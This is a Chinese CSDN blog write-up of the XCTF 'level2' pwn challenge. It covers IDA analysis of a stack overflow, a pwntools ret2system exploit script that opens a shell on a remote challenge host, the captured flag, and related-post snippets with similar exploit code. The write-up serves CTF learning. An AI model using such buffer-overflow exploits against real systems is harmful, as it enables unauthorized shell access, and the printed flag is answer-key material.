攻防世界:level2[WriteUP]

已于 2024-04-14 21:03:04 修改
阅读量321 收藏 4
点赞数 11
文章标签: 网络安全
于 2024-04-14 21:01:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43007452/article/details/137753983
版权

 用checksec、file命令查看文件属性与防护

32位小端序二进制文件

把文件丢进IDA进行逆向分析

在main函数中可以看到一个vulnerable_function函数:'易受攻击的函数'

双击该函数名称查看里面的内容

按F5显示vulnerable_function的伪代码 

可以看到v1数组长度136但最后返回的长度是256

再双击v1数组,查看内存空间

 回到main函数查看可利用的system函数

该_system函数十六进制地址为:0x0804849E

按Shift+F12查看字符串

双击/bin/sh查看地址

 /bin/sh十六进制地址:0x0804A024

 接下来就是构造ROP

 那我们构造的payload就应该是

payload = [溢出空间] + p32(sym_addr) + p32(binsh_addr)

Exploit编写

from pwn import *

binsh_addr = 0x0804A024
sym_addr = 0x0804849E
#注意这里的溢出空间一定不能写成0x92,必须写成88+4
payload = b'a'*0x88 + b'a'*0x4 + p32(sym_addr) + p32(binsh_addr)

shell = remote('61.147.171.105',49308)

shell.sendline(payload)

shell.interactive()

执行ls命令,查看当前目录

再cat一下,本题结束

 cyberpeace{5436a213af9da0c5ea6fc035be0cd309}

0DayHP
关注
攻防世界level2
weixin_43489686的博客
03-30 319
我这种菜鸡就打打这种签到题刷刷存在感吧。。。 32位,基本没啥保护 简单溢出 system函数地址和/bin/sh地址都有了 直接上exp from pwn import * p = remote('111.198.29.45',55216) bin_sh = 0x804A024 system = 0x8048320 payload = 'a'*0x88+'a'*4+p32(syst...
攻防世界 level2
10-04 431
1.题目 2.IDA分析 3.流程分析 流程很简单,输入信息,输出hello world。read函数也存在明显的溢出点。问题是没有找到现成可用的函数cat flag或者调用system函数。因此,只能我们自己构造。 如上图 我们可以获取到system和‘/bin/sh’的地址(注意,/bin/sh在.data段,如果是.rdata段则不能利用,原因还没有找到,可能是因为rdata只读不能执行?知道的读者麻烦评论告知一下~),exp如下: from pwn import...
攻防世界-level2
qq_45771413的博客
04-22 360
查看保护 IDA分析 在vulnerable_function里找到了读取溢出: 字符串长度136,读取长度256,读多了。 这里看到了system,以为可以获取shell,结果发现就是个普通的输出字符串……(菜) 寻找敏感权限: 直接查找字符串找到了 system /bin/sh 但是他俩不在一块儿。第一次直接拼接/bin/sh失败 后面尝试在填充buf和ebp后缝合system和/bin/sh,但是一直不成功。 尝试了两个system的内存地址也是如此…… 上网看别人wp,发现真正调用sy
攻防世界_level2
RMC131的博客
04-10 4322
checksec IDA exp from pwn import * p = remote('111.200.241.244',58154) payload = b'a' * 0x8c + p32(0x08048320) + p32(0) + p32(0x0804A024) p.recvuntil("Input:") p.send(payload) p.interactive() 运行得到flag
[攻防世界]level2
逆向萌新的博客
05-31 173
[攻防世界]level2
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 518
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
初学pwn-攻防世界(level0)
天柱的博客
08-27 1016
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
攻防世界String Writeup
只影的博客
03-04 2314
这道题暂且认为是攻防世界pwn新手区比较难的一道题,而难点主要在于读懂题目,读懂后就比较简单了。 查看程序的防御机制,发现除了PIE全开。从题目string可猜测,应该是个格式化字符串的漏洞。可以在Linux中先将程序跑一遍,对程序的流程和分支有个大概了解,本题是个简单的D&D类型的游戏题目。 用ida对程序进行分析,顺着程序的流程走,可以看到在sub_400BB9中有printf(&am...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1840
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15
重新启程
12-23 1362
题目地址:stack2 这是高手进阶区的第四题了,速度挺快啊,朋友!加油! 废话不说,看看题目先 没有什么特别的内容,那就看看保护机制 root@mypwn:/ctf/work/python/stack2# checksec fcca8ceb507544d1bd9c4a7925907a1d [*] '/ctf/work/python/stack2/fcca8ceb507544d1b...
level0 -- 攻防世界新手题
01-19
来自攻防世界的pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:https://blog.csdn.net/A951860555/article/details/112849849
攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1525
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
攻防世界 Pwn level2
MrTreebook的博客
07-16 514
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
攻防世界和jarvis oj的level2
CNXBDSa的博客
07-27 424
PS:两者题型完全一样 就不过多解释了!!!!!!!! 首先第一步是运行这个程序看程序是什么 然后使用checksec去查看这个的保护机制和位数 详情请去看大佬总结比较详细 然后放入对应的iDA中查看 ...
攻防世界 level2】
@一个努力学编程的网安小可爱的博客
01-21 2732
攻防世界 level2 优秀题解 exp 脚本 from pwn import* #p=remote("111.200.241.244",58836) p=process("./21") payload=('a'*0x8c).encode()+p32(0x0804845C)+p32(0x0804A024).encode() #payload='a'*(0x8c)+p32(0x804A038)+p32(0)+p32(0x804A024).decode('unicode_escape') p.sendl
【愚公系列】2022年01月 攻防世界-简单题-PWN-002(level2)
热门推荐
时光隧道
01-18 3万+
文章目录一、level2二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level2 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level2 checksec --file=level2 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
攻防世界shuffle
最新发布
09-03
- *3* [攻防世界Reverse进阶区-Shuffle-writeup](https://blog.csdn.net/qq_35056292/article/details/108676766)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0DayHP

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值